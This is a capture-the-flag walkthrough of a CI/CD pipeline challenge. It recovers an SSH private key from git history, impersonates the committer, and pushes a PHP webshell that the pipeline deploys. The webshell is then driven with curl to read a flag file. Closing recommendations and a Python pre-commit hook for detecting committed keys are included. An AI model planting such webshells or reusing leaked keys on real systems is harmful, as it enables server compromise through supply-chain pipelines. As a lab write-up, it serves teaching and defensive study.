Elfen Ring - Jolly CI/CD Walkthrough

Jolly CI/CD

Difficulty Level 5/5

Exploit a CI/CD pipeline. Get hints for this challenge from Tinsel Upatree in the Elfen Ring.

After completing the Prison Escape challenge and climbing further upstairs in the game, we talk to Rippin Proudfoot, who asks us to find a vulnerability in the CI/CD pipeline, exploit it and get the ring back. Clicking the terminal presents us with the following information.


The highlighted text suggests PHP is in use, so a PHP-based payload will likely help us as we progress. As the screenshot shows, we have already begun enumerating the environment: privileges, filesystem and so on.

After talking to Tinsel, we find the following: “With this project, once I push a commit, a GitLab runner will automatically deploy the changes to production. WHOOPS! I didn’t mean to commit that to http://gitlab.flag.net.internal/rings-of-powder/wordpress.flag.net.internal.git... Unfortunately, if attackers can get in that pipeline, they can make an awful mess of things!”

Second hint: The thing about Git is that every step of development is accessible – even steps you didn't mean to take! git log can show code skeletons.

Based on Tinsel's hints, first make sure the server gitlab.flag.net.internal is reachable with ping. Once that succeeds, clone the repository http://gitlab.flag.net.internal/rings-of-powder/wordpress.flag.net.internal.git, cd into the directory and run git log, which shows the “Whoops” commit (the same word Tinsel used):

>> ping gitlab.flag.net.internal

>> git clone http://gitlab.flag.net.internal/rings-of-powder/wordpress.flag.net.internal.git

>> cd wordpress.flag.net.internal

>> git log


Next we inspect that specific commit with the following command:

>> git show e19f653bde9ea3de6af21a587e41e7a909db1ca5



From the output we can see that the author knee-oh (sporx@kringlecon.com) accidentally committed their SSH private key, which is now preserved in the commit history.

 

Now we copy the SSH private key, create a .ssh directory and paste the key into a file there, restricting its permissions so that only the owner can read it (ssh refuses keys that are readable by others). Check whether ssh-agent is running, then load the key with ssh-add.


Now we clone the repository again over SSH using the added key, so that we have push rights to the repository under this newly obtained identity:


>> git clone git@gitlab.flag.net.internal:rings-of-powder/wordpress.flag.net.internal.git


Now cd into the newly cloned repo. Before adding a PHP webshell, set the git config to match the newly obtained identity knee-oh with the following commands:


>> git config --global user.email "sporx@kringlecon.com"

>> git config --global user.name "knee-oh"

 

Then we add our webshell to a PHP file in the repository, commit it with a commit message and push the change to the main repository:


>> echo '<?php if(isset($_REQUEST["cmd"])){ echo "<pre>"; $cmd = ($_REQUEST["cmd"]); system($cmd); echo "</pre>"; die; }?>' > hmmm.php

>> git add hmmm.php

>> git commit -m "update"

>> git push

 

Once the pipeline has deployed the push, we can query our PHP webshell by supplying commands to the cmd parameter of hmmm.php:


>> curl http://wordpress.flag.net.internal/hmmm.php?cmd=id

>> curl http://wordpress.flag.net.internal/hmmm.php?cmd=pwd

>> curl http://wordpress.flag.net.internal/hmmm.php?cmd=ls+/


In this output we can see flag.txt in the root directory; hopefully we can cat it.

>> curl http://wordpress.flag.net.internal/hmmm.php?cmd=cat+/flag.txt



Security recommendations


This is a good example of a supply chain risk: a third-party developer accidentally commits their private key to the repository, and the pipeline replicates every push straight to the production instance. That lets an attacker push payloads and webshells to production, leading to full compromise of the server. DevSecOps practice should include secret scanning at the commit stage, warning the developer about credentials before they reach the repository, and any key that does land in history must be rotated, since removing it in a later commit does not remove it from git log.
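As an added example (not from the walkthrough or the challenge), a Python pre-commit check that refuses a commit whose staged diff adds a PEM private-key header, parsing the unified diff format git itself produces; SAMPLE_DIFF is a constructed diff standing in for the leaked commit.

```python
"""Refuse commits that add private-key material (added example, hypothetical hook).

Install as .git/hooks/pre-commit (chmod +x); it scans `git diff --cached`.
"""
import re
import subprocess
import sys

# PEM armour used by OpenSSH, RSA, EC, DSA, PKCS#8 and encrypted private keys.
PEM_PRIVATE_KEY = re.compile(r"-----BEGIN (?:[A-Z ]+ )?PRIVATE KEY-----")

# Constructed sample: what a staged deploy script that embeds a key looks like.
SAMPLE_DIFF = (
    "diff --git a/deploy.sh b/deploy.sh\n"
    "--- /dev/null\n"
    "+++ b/deploy.sh\n"
    "@@ -0,0 +1,4 @@\n"
    "+#!/bin/sh\n"
    "+cat > /tmp/id <<'EOF'\n"
    "+-----BEGIN OPENSSH PRIVATE KEY-----\n"
    "+EOF\n"
)

def find_private_keys(diff_text: str) -> list[tuple[str, int]]:
    """Return (file, new-side line number) for each added line opening a key block.

    Only '+' lines are inspected, so deleting an already-leaked key does not
    re-trigger the hook; the key still has to be rotated, history keeps it.
    """
    findings, current_file, line_no = [], None, 0
    for line in diff_text.splitlines():
        if line.startswith("+++ "):
            current_file = line[4:].removeprefix("b/")
        elif line.startswith("@@"):
            m = re.search(r"\+(\d+)", line)      # "@@ -a,b +c,d @@": new side starts at c
            line_no = int(m.group(1)) - 1 if m else 0
        elif line.startswith("+"):
            line_no += 1
            if PEM_PRIVATE_KEY.search(line):
                findings.append((current_file, line_no))
        elif line.startswith("-") or line.startswith("\\"):
            continue                               # removed line / "No newline" marker
        else:
            line_no += 1                           # context line advances new side
    return findings

def staged_diff() -> str:
    """Text of what `git commit` would record right now."""
    return subprocess.run(["git", "diff", "--cached", "--no-color"],
                          check=True, capture_output=True, text=True).stdout

if __name__ == "__main__":
    hits = find_private_keys(staged_diff())
    for path, n in hits:
        print(f"refusing commit: private key header in {path}:{n}", file=sys.stderr)
    sys.exit(1 if hits else 0)
```

The same function can be run in a CI job over `git log -p` of the commits under review, which would have flagged the Whoops commit before the runner deployed it.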

 

Troubleshoots


The whole setup for Jolly CI/CD takes 3-5 minutes to boot up, so be patient, especially until these two commands succeed:


>> ping gitlab.flag.net.internal

>> git clone http://gitlab.flag.net.internal/rings-of-powder/wordpress.flag.net.internal.git


Elfen Ring full map




Elf Ring Unlocked !

Since all the challenges were Linux ELF related, I guess that’s why it’s called the ELFen Ring.
